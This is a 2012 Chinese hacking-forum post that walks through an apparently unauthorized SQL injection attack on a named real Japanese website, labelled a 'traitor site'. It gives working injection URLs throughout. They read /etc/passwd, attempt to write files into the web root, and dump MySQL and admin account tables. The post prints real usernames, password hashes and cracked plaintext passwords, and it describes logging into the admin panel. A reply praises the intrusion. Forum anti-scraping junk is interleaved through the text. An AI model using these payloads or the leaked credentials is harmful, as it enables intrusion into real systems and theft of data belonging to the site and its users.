中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

- B0 X5 }5 h' ~- d; H# m8 m) A& B1 \. {* }2 ~6 ^! O
0x01. 检测 www.zuaa.jp 收集数据* W+ b) q$ m- `2 [6 O* q# X; @" ~, d
[attach]73[/attach]! N5 F0 K- [3 M# i9 @- A* y; {2 _7 S

) A: h' u0 u, Y0 I& R# d4 s: V  {) G' Uwhatweb' q' H/ _  @3 O, `/ Q
[attach]74[/attach]  ]! O8 ?3 Q* d
/ a, ]# o/ `7 D
利用NMAP扫描
8 f2 }4 y; V; ?2 J% i& u+ P& E+ h, ]* y[attach]75[/attach]
; u, r( J; o% V中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
, s6 O- V1 n' c# h0x02.找注入点4 q' I7 y/ k+ \3 v( J
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
3 t- S) v  \2 g8 m! B" i[attach]76[/attach]# u: v0 [+ |7 ?1 b2 H

7 d- S. q1 q8 e0x03.order by9 p2 H4 Q3 E, m+ n9 W, _
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 11 k1 ~+ D5 w$ x; Q2 Z
[attach]77[/attach]
+ @1 T( }% g+ n7 _8 d3 w$ Gorder by 28报错,order by 27正常
* n( e0 m) N6 p& r* F1 x
4 \% Q' A+ a- ]. Y( w0x04.   union手动查询3 D2 F7 O8 U; X1 ^6 Z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% {! `# h, @: w2 H5 |, Y" ^添加到 27 时正常显示
  j, b, S- X% D7 |[attach]78[/attach]' l1 }6 C, p1 q
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
# x+ C7 `7 n+ r1 Z' y" F1 `& z+ b- v4 K  s/ n2 `2 q( F
0x05. info:
0 y8 k' D2 z. r2 i0 y1 f( P" Shttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 2 J  y  q" F2 Y2 J3 @
[attach]79[/attach]
! s! D4 b& h+ k/ [, q3 ~user:            root@localhost6 r8 F. e9 _2 A6 y' T4 d5 f+ t
database:    openpne/ R: W) a# j7 `- V. K
version:      4.1.22
2 M3 G% g6 l% ^  h7 Dos:             portbld-freebsd5.4
! G1 B; P  \* p; P7 ]- ^+ ?: u9 M) v6 F) y5 F
0x06. root用户
: |/ |9 s0 T( c' ^) m利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)- N) x5 X8 L( T, E+ R1 d1 P7 H
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 $ W$ F( S" L  `5 K
[attach]80[/attach]- P0 d9 z+ D6 j  t' Q- h& ?/ r
通过工具转换
+ l1 j# K  Y, H' a& t[attach]81[/attach]- H$ ~  {% O# h3 T
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
* _9 ]) g) M  Z  o6 k: C8 n4 l. \; j8 |) D+ q+ S: k. Y8 z" A
0x07. 利用 into outfile
0 A' M4 r$ I2 y5 ~  Y0 v% e全部都失败" T% b& {8 x! i: O& E  x& s
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
) K' z5 Y7 d1 ]5 U0 `2 {$ m
1 k( @- c& ~0 z6 \. {http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
# b: a, V' w( f! ^+ I! n
5 v# ^$ |, D. F3 |+ }, {! C页面显示“MDB2 Error:syntax error”
) S4 O& P% W+ R' L$ |+ t5 S$ ?+ m8 l% H3 f, ?8 ?  I! N( e& x
0x08. 利用 mysql 4.1
+ e8 B( b& F* B猜常规表名,字段未果 工具 sqlmap
: r5 d, o( N; s2 q6 n中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持0 ~8 l& O: Y& m' j
3 x: Q& ^, ?& L( o' f# U/ k) U3 ^$ F6 _
[attach]82[/attach]8 w" G6 o' v/ K0 x

7 x# ^& f: c' ~; f; Z9 s: s! p& \0x09. 查找后台
' p" f4 j- n9 Z, W1 S利用 现有的各种 后台工具尝试都不行
" M  N& l7 l6 q5 r% O  P
, U( G6 N0 z. r+ i0x10.  MySL外联方法* h9 @7 \5 {. [; g5 L$ R
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行; \2 v( T2 g5 o/ |" b, M
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
8 N% p! o$ g0 w" ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
0 L* k1 q) X! y[attach]83[/attach]
$ H0 ?& n" y: D6 w& h% M这个可以在 www.cmd5.com 解密
/ T$ p! `! H& c3 Y$ ^( froot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
$ l( B, \( {( {0 |5 X9 [7 m7 L7 \. Uchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
8 Q: q7 r* c9 Vopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( E: w( |% H3 qzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
/ x) W/ v* m- k' z) V/ {工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知- w' U% _$ v/ L9 z4 ^
[attach]84[/attach]  w+ z' [' N  k3 _% @4 t
# o, ~" f% F+ n
0x11. 网站突破8 q9 ]" N% W( `  B% z
发现网站的源程序 openpne, google 下载 openpne 源码
1 q/ }$ h( k- [2 C[attach]85[/attach]
, K4 b% g7 G. x# L6 [4 Y! o& m8 B0 o" M+ c  W2 p8 b, O
0x12. 默认信息利用, G& s. P0 Y% M3 f1 B8 a
http://sns.zuaa.jp/?m=admin&a=page_login
! q/ o0 O6 g$ i# r; v" r  ~[attach]86[/attach]* p0 D+ e& W9 @& F' k% ?( \
表名 (c_admin_user) ,字段名(username,password)) h$ n) c" f" H) h" K
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
1 J5 k) X2 M! P3 Q[attach]87[/attach]; J  o, I. t8 k) i0 [2 V6 i3 H" g
解密
5 v( r# Y& v, x/ ^; ~" k, Q- Pzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
$ l/ ^. Q) Q# P$ B# _zuaajp:c0923ec5857796a393da99905008c176,          zju1897
$ d7 j5 n, b9 G% m% P, {3 V6 K, w
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
' M/ Z9 K& `: ?4 d9 j) }5 W% Y, _" t; K/ ?! S. E& c
0x13. 登录后台$ h, z" {6 _, g; R$ E) N
[attach]88[/attach]
  ?1 ?2 l/ w4 s8 ~) y3 h* o" N9 q6 ~' Q7 n& {; ?

) w0 m! J( X" Q$ S7 L1 e0x14. 小结$ t5 D0 [( X' a9 L1 }% }
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。  \4 z' ^; V& K  ^) o
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
- ]  z0 k6 j! j* t" G: n+ P------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
2 C( @5 v/ W* I8 a中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持, W- F! }  J1 ~! U" ]! Q( A

# k# ^5 U+ N6 \& W4 f/ [: c最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
2 \7 k) ~# {' c; ~
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2